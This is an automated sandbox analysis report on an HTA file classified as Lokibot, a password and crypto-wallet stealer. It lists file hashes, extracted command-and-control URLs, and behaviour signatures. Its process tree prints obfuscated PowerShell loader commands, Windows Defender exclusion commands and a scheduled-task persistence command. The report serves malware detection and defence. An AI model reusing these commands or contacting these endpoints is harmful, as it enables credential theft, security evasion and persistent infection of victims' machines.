Analysis

  • max time kernel
    119s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    20-11-2024 07:19

General

  • Target

    greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta

  • Size

    178KB

  • MD5

    4ce3b0e612e1968b6c491ab1ab818884

  • SHA1

    cbc890a816e9b7e993c90fb63d51526a76616323

  • SHA256

    a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0

  • SHA512

    9b87141b10a2e781e51483dced485817aeb34b545f6dbf64803b4b3621cd4dd74587a5033ab1aa3b931fbd39bc7c77650a0ccdd6b4132b48fbeab9d0fbb3d816

  • SSDEEP

    96:4vCl17HUofTaTGoHTapZR3CyYaMJhS1i3hTaNopQ:4vCldHULTG3pZLYKi3gN2Q

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.41/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
      "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1352
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2744
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yygz-_yf.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7BA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD7B9.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2096
      • C:\Users\Admin\AppData\Roaming\caspol.exe
        "C:\Users\Admin\AppData\Roaming\caspol.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2844
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1060
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1456
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5B69.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1836
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2216

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESD7BA.tmp

    Filesize

    1KB

    MD5

    3112e1b1ad9c31faa74f1c23fa539356

    SHA1

    a4ca1a7c6858078749fbb53e96452563c6a6e2d4

    SHA256

    c5e3ca49a654c74b23b45b9c10bd52a07074f089296d7f238c07f70e59df95f2

    SHA512

    e6d8b36b949240b2176608cde7391db5aa2bfa02926be81777b3969970b6f2a83208185e3398377cfd53c3f0483665f4ef35a2b46aeb0b08204503d581b20626

  • C:\Users\Admin\AppData\Local\Temp\tmp5B69.tmp

    Filesize

    1KB

    MD5

    644acd672def50f90420e4f03528d496

    SHA1

    03ddd4937e44f36e9cfbfd97812b8f0cd44fef73

    SHA256

    f0200586128367b78d108181914aee71aa5e921161c36921a9f98d291f86c2bf

    SHA512

    31ff4b7640c0a06e83741a132413b4bf85773d14b0a7a5a12306339f76b2fa4a66aa3934bca47ba4a6639ad7861a94c689a4d907ed81c5182e6d551d451bcac3

  • C:\Users\Admin\AppData\Local\Temp\yygz-_yf.dll

    Filesize

    3KB

    MD5

    63b7c94192c91c41ed9599d4027f1864

    SHA1

    2f729fbeef93d95f38291ff15a4f2a1e8abfe46f

    SHA256

    f44cf0ee89deea2b92ceb23342473d7bfef4f86be796ad4426f263aaf09795ed

    SHA512

    b11e3dafe861af2947c600261889f6b7985bfaee5e73925444e8edd779e0988fc000bb8f875d6bc49431e295dfc57559f58eb3d0de2afedf8eb744f2620165d8

  • C:\Users\Admin\AppData\Local\Temp\yygz-_yf.pdb

    Filesize

    7KB

    MD5

    a45938611a6990e0538f54be4863c634

    SHA1

    661d7dc529ae744893df27e5d2d89135a7976434

    SHA256

    8d76319dd56ad6740350d97cadcc4353a8b5565687dd1e0e0b5fde43eec4ecdf

    SHA512

    a73e7d284d259e94c3a70a4fed37b6a659327bbe3fc0d6838db63a9170e521d7032f9eaec1eec9a8b69d841448a5b2daea15882d9134d5090410958aef66ea1b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    9a5f8f28cd7be7a84d1d0cf33bac967f

    SHA1

    d3f2b64909980123efdb7077997b8fb7df2bd841

    SHA256

    01f303a121024bbf0992561d9323bf218cddd617d82aea5d862c12da974bdafd

    SHA512

    3226321cd441392715cafd9f0909048ccc3003d747625e20b0631f3ef2eed89248c5bdfcd4cb0c6256a830c1b6653a64dfdf78ceb215fffbf7d5f9aa1512434f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    35fa34d8e175aca60aa63d5c0bbba04d

    SHA1

    2b12ff28f32f3cfd7e102c55b77efef53086784c

    SHA256

    3436cbceb57520feca975a98b44df7f33c453560b3f8f9f7103fe7f327a23051

    SHA512

    8028b4c926e3fc56ac7649c15cf1824071296c2ca48d399b27a7841a9dc645da791fed16081abbb690835badf20b5909ad9c3f101752a1b9b00dffeeb618a53f

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCD7B9.tmp

    Filesize

    652B

    MD5

    df2a95e4185073c5332d6df93099c54e

    SHA1

    73414dc5dda05bdcae60ad1a0ee19821dfb06088

    SHA256

    4be699c85a59f2bfeca2f059afbd77573231bae4947bde88c5bd9db246494670

    SHA512

    cf13d791464125af71aa959634674bf5e6abe80a09493683d5fd1cb78cbc0f22e4f3034552bd0971b84216cb0ce72b526e8e8e31d2f1aa15ced80a14b5700a4a

  • \??\c:\Users\Admin\AppData\Local\Temp\yygz-_yf.0.cs

    Filesize

    484B

    MD5

    fe82050659a8b97690d60529499222c1

    SHA1

    7cc50135852b46dd1e36f2ff98506613db525a68

    SHA256

    64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a

    SHA512

    59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f

  • \??\c:\Users\Admin\AppData\Local\Temp\yygz-_yf.cmdline

    Filesize

    309B

    MD5

    5423583de2ddb787508e3d60ef57237d

    SHA1

    9ae2c941350820f705adced6f8d7327de8aa56a9

    SHA256

    3a75ab620ed0a503c47f6d8843b5c224525f67fe9ed28f54561043a650a43cd1

    SHA512

    39a84d9ec48bffcef7d6b50adfcb1f18dadd7a6366e76a56415c222dfcde2ed82cabc7f8e46230f4873e11655d79ea4d9374e70f2ffd5e1aa98e1ba02b1ff7ec

  • \Users\Admin\AppData\Roaming\caspol.exe

    Filesize

    586KB

    MD5

    74061922f1e78c237a66d12a15a18181

    SHA1

    e31ee444aaa552a100f006e43f0810497a3b0387

    SHA256

    89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c

    SHA512

    306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136

  • memory/2216-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2216-62-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-68-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-66-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-64-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-75-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-73-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-70-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-95-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-103-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2844-46-0x00000000052A0000-0x0000000005304000-memory.dmp

    Filesize

    400KB

  • memory/2844-45-0x0000000000340000-0x0000000000352000-memory.dmp

    Filesize

    72KB

  • memory/2844-44-0x0000000001250000-0x00000000012E8000-memory.dmp

    Filesize

    608KB